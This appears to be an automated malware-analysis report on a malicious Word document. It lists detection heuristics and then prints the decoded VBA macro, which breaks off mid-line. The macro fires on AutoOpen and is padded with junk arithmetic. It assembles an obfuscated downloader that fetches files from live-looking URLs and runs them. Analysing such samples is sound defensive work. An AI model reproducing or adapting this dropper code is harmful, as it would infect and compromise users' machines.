Verdict: MALICIOUS
Risk Score: 242

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1203 Exploitation for Client Execution
The sample is a malicious Office document containing a VBA macro with an AutoOpen function. The macro calls Shell(), indicating an attempt to execute a secondary payload. ClamAV identified the file as 'Img.Dropper.PhishingLure-6443153-0', consistent with a dropper or phishing lure.
Heuristics (7)
- ClamAV: Img.Dropper.PhishingLure-6443153-0 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
- VBA macros detected [medium, OLE_VBA_MACROS, 3 related findings]: Document contains VBA macro code
- Shell() call in VBA [critical, OLE_VBA_SHELL]: Shell() call in VBA
- AutoOpen macro [high, OLE_VBA_AUTOOPEN]: AutoOpen macro
- VBA p-code auto-exec with execution tokens [high, OLE_VBA_PCODE_AUTOEXEC_EXEC]: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker [medium, OLE_LEGACY_WORDBASIC_AUTOEXEC]: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL [info, EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 58858 bytes |

SHA-256 (macros.bas): 4425621d25c5bb44a2d20695daa15b18556c9f7ac7e8e15d82af3b05ecf07e39
Preview script: first 1,000 lines of the extracted script (macros.bas)
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "JLziJYksQ"
Sub AutoOpen()
On Error Resume Next
jAtulcdmw = 5151274 * Sqr(CpjSYUbBPNvGD) * WmXNWwjrRjz / CStr(2425590) * (7668841 / CDate(WjZmUNWbqnpsT) * 7346088 / ChrW(pltqTOpGZacNLY) * 9433465 * Int(MjiijnIlp))
EvwjYdits = 5378933 * Sqr(FWUdjdAMsALDtU) * MlHTCdHAPTt / CStr(4284393) * (82497 / CDate(zTTwwNpMFwCmvt) * 7809863 / ChrW(sDPvRtmYZVzVE) * 1958635 * Int(GAQuhsHuHnzf))
IRPhOMXbq = 1343637 * Sqr(iEjuWdP) * HvLvmfwHzl / CStr(1640070) * (1553739 / CDate(RNdHKnjJ) * 6479553 / ChrW(wAvlqAzkRrTs) * 7081237 * Int(VdCPEXqhwwNqDn))
LpjKZMOvq = 8879302 * Sqr(GBArQoZc) * lhlTEJsOBwY / CStr(9925372) * (9497789 / CDate(ZbLJSYiZ) * 7385811 / ChrW(HwVqqiIn) * 2703618 * Int(BiDMFPTzur))
Application.Run "wmZppak", OOFQbiTXjAb
WIJraQEiG = 792932 * Sqr(MvdLGoCYSqklaI) * XwEDEiiulzoiPa / CStr(5707000) * (5772839 / CDate(JZpjaAwbRbcB) * 7253016 / ChrW(ijfsFZDzOh) * 91264 * Int(MRJmwoMCbBTMz))
zFbnHCtAc = 1178569 * Sqr(khXEiKKHihohRi) * npivhQTvHUb / CStr(2264867) * (1390496 / CDate(HsjLOCRRIYQ) * 8284226 / ChrW(dPJYJIfP) * 770929 * Int(hYiQlPjCw))
DcbpEVCcL = 4239480 * Sqr(KiqFqjwvRDcP) * aCmkmfB / CStr(4683688) * (4178749 / CDate(oiCZEDGjT) * 8763407 / ChrW(HCiZaFRolv) * 5180876 * Int(XPBiSqjUI))
oMCWnGusK = 4420514 * Sqr(VjTAEKLZ) * jkWNUiKCUopn / CStr(4762877) * (2826885 / CDate(qfCmwXwbY) * 3576700 / ChrW(rvBiIiGkYEqpC) * 1842680 * Int(rXWhUwRAKYHYaM))
End Sub
Function OOFQbiTXjAb()
On Error Resume Next
GZmdCizPVm = ("XlsRbjectvY2+vY2 vY2+AIC+AICvY2randomvY2+vY2;C7gbcdvY2+vY2 = 3CvY2+vY2ShvY2+vY2ttvY2+vY2'+'p://wwvY2+vY2w.vY2+vY2kovY2+vY2ziolku.pl/omAIC+AICgr/,httpvY2+vY2AIC+AIC://www.svY2+vY2ca4christ6PSZMmZCRDT85kT1iUf")
koDjqpYz = 7909871 * Sqr(AUPSVPbUQu) * imHpZwaRUE / CStr(5863982) * (8535884 / CDate(bNjpfdtUTD) * 3155296 / ChrW(cIpZoiLkKQhoT) * 6717197 * Int(DBVSVcprIilo))
oKFGFA = 7365054 * Sqr(DKjqBzo) * rfVTHOKfrWws / CStr(7947099) * (3690849 / CDate(luLmQjqDuYjGGw) * 9644049 / ChrW(lzSJpwCUa) * 6296597 * Int(qPruLkLwwpK))
XXLRPtisz = Mid(GZmdCizPVm, 5, 183)
aqNzwY = ("zi53F2pasvY2+AIC+AICIE0TbRPMp9wp7ul9")
RQVcrSLdM = 9858631 * Sqr(KhrdjVIAvTjt) * IICdXfjvrpzcdm / CStr(2527065) * (1427208 / CDate(ztwjRNFhwd) * 6330638 / ChrW(HqUFEftwKBj) * 3075915 * Int(SsuAGjvtVWqvM))
qIFHiw = 8100266 * Sqr(zwaCCUkzcWYGUI) * vJipzVLjp / CStr(8847805) * (7285220 / CDate(lUiKrpwBOajN) * 4219799 / ChrW(sRdicbkGajNW) * 8156894 * Int(lPlIQowfwL))
ziRVMPsfld = Mid(aqNzwY, 6, 15)
ZAkEbZ = ("2XEs96YrcA.vY2+vY'+'2ToString(vY2+vY2), C7ghuas);InvY2+vY2vvY2+v'+'Y2ok'+'vY'+'2+vY2e-Item(C7ghuavY'+'2fw")
JHdFrwJ = 4476511 * Sqr(iPZlFFFSXotF) * acWnKhrpP / CStr(5419442) * (3700556 / CDate(psJmHYz) * 4108499 / ChrW(phTaYlAZv) * 9338379 * Int(JtsTULVX))
oYfzAnQmn = 6100003 * Sqr(SnGhPMvjQQtjAk) * DNmvrQUfMuvAqR / CStr(9163541) * (620024 / CDate(pUXuMsIYEtf) * 6237315 / ChrW(ZtHXQwibo) * 6203408 * Int(HunUMFOUMQujNB))
jwGJYZC = Mid(ZAkEbZ, 11, 93)
vCiUjGPEKH = ("T9LzuOY0U813D932OcRKAIC);vAIC+AICY2+vY2C7ghuvY2+vY2as = C7genv'+'Y2'+'+vY2vvY2+vAIC+AIC'+'Y2:pvY2+vY2uAIC+AICblic vY2AIC+AIC+vY2+AIC+AIC 3CSYlvY2+vY2F3CvY2+vY2S +vY2+vY2 CvY2+vY27gkavY2+vY2jAvz")
whNqHWfK = 7485489 * Sqr(dfBppzwbTPzzi) * iXnXtNSna / CStr(6403556) * (7427668 / CDate(FHBOPsPSjc) * 8784944 / ChrW(bTplDdRtNaj) * 189718 * Int(SRZYpEUCUtp))
ZANPqK = 5033560 * Sqr(zEjMiCd) * vZYjjzPs / CStr(1574960) * (6038637 / CDate(AmzaptqXZa) * 1475048 / ChrW(zLwiNJBrhXR) * 4456044 * Int(BrFHFJMORZRBi))
PlWqmPujn = Mid(vCiUjGPEKH, 21, 169)
hQOLNZ = ("RwriHzIwTwzPcC-JoiNAICAIC)'+'((AIC((vY2CAIC9FKB1Jk")
QMwZEhrtTA = 9099050 * Sqr(QHOkTrn) * kEqTTYnnJnqpL / CStr(6048413) * (3010131 / CDate(RpqlHokBnJR) * 8619775 / ChrW(iNrFmmQzjIjno) * 7454875 * Int(kFulrmTi))
czsmz = 222664 * Sqr(ivUpfJG) * wbawkYtzihjKwT / CStr(388083) * (5290596 / CDate(iPjBCPjqD) * 764010 / ChrW
... (truncated)